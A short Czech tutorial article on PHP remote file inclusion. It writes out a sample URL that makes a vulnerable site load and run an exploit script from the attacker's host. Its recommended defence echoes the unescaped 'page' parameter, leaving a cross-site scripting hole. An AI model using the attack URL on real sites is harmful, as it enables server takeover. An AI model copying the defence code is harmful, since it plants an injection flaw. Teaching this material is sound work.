Zde Vám popíšu útok a obranu pomocí této injekce...
Pro uživatele,kteří dělají web,tak se už určitě někdy setkali s jazykem PHP,umožňující nesmírně možností okolo tvorby webu.V tomto článku si řekneme,jak se bránit proti útokům,jak tuhle chybu už po zobrazení zdrojového kodu poznáme a popis samotné PHP injekce.PHP je pro tvorbu webu nesmírně důležitý,obzvlášť pro ty,kteří to s tvorbou webových stránek myslí vážně.Samotný útok je velmi jednoduchý,tedy řeknu Vám jak funguje.Řekněme,že "Hacker" zjistí,že na dané webové stránce je
chyba při includaci dat,tak si napíše vlastní script,který tuto chybu zneužije a následovně ji na daném webu spustí.Pokud na webu není obrana proti této chybě,útočník už se serverem může dělat takřka vše.Teď zmíněné informace trošku více rozebereme.
Jak můžeme najít chybný web?
Jednoduše,buď se podíváme přímo do zdrojového kodu,nebo si napíšeme vlastní PHP script.
Popis útoku
Pokud jste už na daném webu chybu našli,tak teď si na ni napište script v php,který této chyby bude zneužívat.Pokud jsme se scriptem hotovy,aplikujeme jej na náš web následovně:
www.webschybou.cz/ -snadno napadnutelný web
www.mujweb.wz.cz/exploit.txt -muj web s adresou scriptu (exploitu)
www.webschybou.cz/index.php?page=www.mujweb.wz.cz/exploit.txt -takto náš script na web s chybou aplikujeme.
Obrana:
Obrana je velmi jednoduchá,stačí nám na naši stránku aplikovat následující PHP script:
$page = $_GET['page'];
switch($page) {
case "news":
include("./novinky.php");
break;
case "contact":
include("./kontakt.php");
break;
default:
echo("Sekce " . $page . " Stránka nenalezena!");
}
?>Vysvětlivky:
Hack = násilné vniknutí
Hacker= výrazem hacker se označují lidé,kteří se snaží nabourávat do cizích systémů/webových stránek pomocí chyb,které následně zneužijí
exploit= script/kod zneužívající chyby
UPOZORNĚNÍ:NIKDY NA ŽÁDNÝ WEB NEÚTOČTE,POKUD BY JSTE NA NĚJAKÉM WEBU NAŠLI CHYBU,RADĚJI TO NAHLASTE ADMINOVI,JE LEPŠÍ POMÁHAT NEŽ ŠKODIT,AUTOR ČLÁNKU NEZODPOVÍDÁ ZA ŽÁDNÉ ŠKODY
Článek napsal Lukáš Blažek
Autor: Lukáš Blažek
2024 ©